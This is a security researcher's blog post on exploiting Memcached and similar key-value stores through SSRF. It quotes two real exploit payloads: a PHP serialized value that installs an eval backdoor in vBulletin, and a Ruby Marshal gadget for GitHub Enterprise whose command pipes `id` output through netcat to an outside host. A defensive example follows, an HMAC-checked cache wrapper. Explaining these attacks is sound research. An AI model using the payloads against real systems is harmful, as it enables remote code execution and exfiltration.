SSRF, Memcached and other key-value injections in the wild

Ivan Novikov
Aug 6, 2017

Back in 2012 we released different techniques for exploiting Memcached servers and other services with host-based authentication through SSRF.

Two years later, in 2014, I presented Memcached injection techniques at Black Hat USA (https://www.blackhat.com/docs/us-14/materials/us-14-Novikov-The-New-Page-Of-Injections-Book-Memcached-Injections-WP.pdf). There I mentioned that they can be exploited as Remote Code Execution vulnerabilities when the data is unserialized on the application side.

Then in 2016 I released the same approach for other key-value databases, such as Redis, Riak and CouchDB (http://www.syscan.org/slides/2016_SG_Ivan_Novikov_Key-value_injections_here.pdf).

And I am very pleased that all these studies were not in vain!

Two years ago (2015) we registered the first public exploit for vBulletin which used an SSRF vulnerability to inject arbitrary serialized data into Memcached. Here it is:

The payload there looks like:

set pluginlist 0 0 96
a:1:{s:12:"global_start";s:62:"if(isset($_REQUEST['eval'])){eval($_REQUEST['eval']);die();}";

It is PHP serialized data that is put into the Memcached key “pluginlist”. vBulletin reads the value of this key, then unserializes and executes it.

This year the second SSRF/Memcached exploit was released. It is a GitHub Enterprise vulnerability:

https://www.exploit-db.com/exploits/42392/

The payload is listed below:

set githubproductionsearch/queries/code_query:857be82362ba02525cef496458ffb09cf30f6256:v3:count 0 60 <LEN>\x04\x08o:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy\x07:\x0e@instanceo:\x08ERB\x07:\t@srcI"\x1e`id | nc orange.tw 12345`\x06:\x06ET:\x0c@linenoi\x00:\x0c@method:\x0bresult

As you can see, it is Ruby Marshal serialized data. The payload is almost the same as the previous one, but in a different serialization format.
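Both payloads work because the application deserializes whatever it finds under a cache key. The following is an added example, not code from the original post, vBulletin or GitHub: a cache wrapper that authenticates every value with an HMAC before `Marshal.load`, so a value written by an injected `set` is rejected. The class name `SignedCache`, the demo secret and the Hash standing in for Memcached are assumptions.

```ruby
require 'openssl'

# Hypothetical wrapper (an assumption, not vBulletin's or GitHub's code):
# a value is deserialized only if it carries a valid HMAC-SHA256 tag.
class SignedCache
  class TamperedValue < StandardError; end
  MAC_LEN = 32 # HMAC-SHA256 tag size in bytes

  def initialize(store, secret)
    @store = store   # a Hash stands in for the Memcached client here
    @secret = secret # application-side key, never written to the cache
  end

  def write(key, object)
    blob = Marshal.dump(object)
    @store[key] = mac(key, blob) + blob
  end

  def read(key)
    raw = @store[key]
    return nil if raw.nil?
    raw = raw.b
    tag = raw.byteslice(0, MAC_LEN).to_s
    blob = raw.byteslice(MAC_LEN, raw.bytesize).to_s
    raise TamperedValue, key unless same?(tag, mac(key, blob))
    Marshal.load(blob) # reached only for values this application wrote
  end

  private

  # The key name is part of the MAC, so a valid value cannot be replayed
  # under a different key.
  def mac(key, blob)
    OpenSSL::HMAC.digest('SHA256', @secret, "#{key.bytesize}:".b + key.b + blob)
  end

  # Constant-time comparison of two byte strings.
  def same?(a, b)
    return false unless a.bytesize == b.bytesize
    a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
  end
end

demo_store = {}
demo = SignedCache.new(demo_store, 'constructed-demo-secret')
demo.write('pluginlist', { 'global_start' => 'noop' })
p demo.read('pluginlist') # signed value written by the application
```

Storing plain data in a format such as JSON instead of Marshal or PHP serialization removes the object-instantiation step altogether; the MAC addresses the case where the serialization format cannot be changed.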

So, it’s really cool that my previous research found some practical applications. I hope that somebody will finally find something with Python/Pickle ;)

Enjoy!

Ivan Novikov

CEO at Wallarm. Application security platform to prevent threats and discover vulnerabilities in real time.